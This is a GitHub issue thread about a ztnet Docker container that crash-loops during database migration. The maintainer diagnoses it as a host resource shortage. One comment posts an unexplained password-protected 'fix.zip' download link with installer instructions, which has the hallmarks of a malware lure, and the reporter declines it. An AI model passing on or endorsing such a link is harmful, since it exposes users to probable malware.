### ISSUE TITLE
[Support]: Unable to launch ztnet using included docker compose

### ISSUE THREAD

**Issue by khastings1066** [sinamics/ztnet#525]
### 📝 Inquiry

I am unable to launch a new system using the included compose file.

The ztnet container simply loops with this error:
`
Creating .env file...
Applying migrations to the database...
  #  node[9]: std::unique_ptr<long unsigned int> node::WorkerThreadsTaskRunner::DelayedTaskScheduler::Start() at ../src/node_platform.cc:68
  #  Assertion failed: (0) == (uv_thread_create(t.get(), start_thread, this))
----- Native stack trace -----
 1: 0xf5ed27 node::Assert(node::AssertionInfo const&) [node]
 2: 0xfe527e node::WorkerThreadsTaskRunner::WorkerThreadsTaskRunner(int) [node]
 3: 0xfe535c node::NodePlatform::NodePlatform(int, v8::TracingController*, v8::PageAllocator*) [node]
 4: 0xf12a46  [node]
 5: 0xf13f44 node::Start(int, char**) [node]
 6: 0x7f0a29f4724a  [/lib/x86_64-linux-gnu/libc.so.6]
 7: 0x7f0a29f47305 __libc_start_main [/lib/x86_64-linux-gnu/libc.so.6]
 8: 0xe6191e _start [node]
/app/init-db.sh: line 55:     9 Aborted                 (core dumped) npx prisma migrate deploy
An error occurred. Exiting...
`

I have tried both the latest, 0.6.10 and 0.6.9 containers while making sure there are no remaining volumes with possible old data. The database is created in postgres but remains empty.

### 🔖 Version

latest, 0.6.10, 0.6.9

### 🔧 Deployment Type

- [X] Docker
- [ ] Standalone

### 💻 Operating System

Ubuntu

### 🌐 Browser

Chrome

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by khastings1066** [comment]
Going to need a lot more info that that if you want me to download and run random code on my systems.

**Comment by sinamics** [comment]
looks to me like a resource issue. 
how much ram and cores is available, and is there any other applications running on the same host?

post the output of these commands:
`docker -v`
`free -h`
`uname -a`
`cat /etc/os-release`

**Comment by khastings1066** [comment]
Yep. That was exactly it. There are other docker containers running on that host but nothing outside of docker. As soon as I moved over to a new host I was working to spin up (with a newer Ubuntu LTS as well) it came right up.

Thanks for the help.
